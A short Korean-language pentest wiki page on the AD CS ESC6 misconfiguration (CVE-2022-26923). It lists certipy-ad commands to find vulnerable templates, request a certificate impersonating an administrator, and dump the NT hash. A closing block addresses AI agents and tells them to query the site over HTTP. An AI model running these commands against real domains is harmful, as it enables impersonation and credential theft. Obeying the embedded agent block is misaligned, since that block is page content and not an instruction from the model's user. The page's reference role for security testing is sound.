# ESC6 {% hint style="info" %} 해당 취약점은 2022년 5월 Microsoft 보안 업데이트를 통해 패치된 CVE-2022-26923입니다. {% endhint %} CA의 구성 설정 중 `EDITF_ATTRIBUTESUBJECTALTNAME2` 플래그는 인증서를 요청 할 때 클라이언트가 SAN(Subject Alt Name) 필드를 요청할 수 있도록 허가하는 특수한 속성입니다. 이 플래그가 활성화 되어있다면 `Supply in the request` 가 활성화 되지 않아도 다른 사용자를 가장하여 인증서 발행이 가능합니다. {% hint style="info" %} 보안 업데이트가 된 환경이더라도 SID 보안 확장이 미흡한 경우 취약점은 여전히 유효합니다. {% endhint %} ## Abuse

# 취약한 템플릿 열거
certipy-ad find -u '<username>' -p '<password>' -dc-ip '<dc-ip>' -vulnerable -stdout -enabled

# 템플릿을 통한 인증서 발급
certipy-ad req -u '<username@domain>' -p '<password>' -dc-ip '<dc-ip>' -target '<ca-fqdn>' -ca '<ca-name>' -template '<template>' -upn '<administrator@domain>' -sid '<sid>'

# 인증서로부터 nt해시 덤프
certipy-ad auth -pfx '<pfx>' -dc-ip '<dc-ip>'

## References {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentestwiki.com/active-directory/adcs/esc6.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.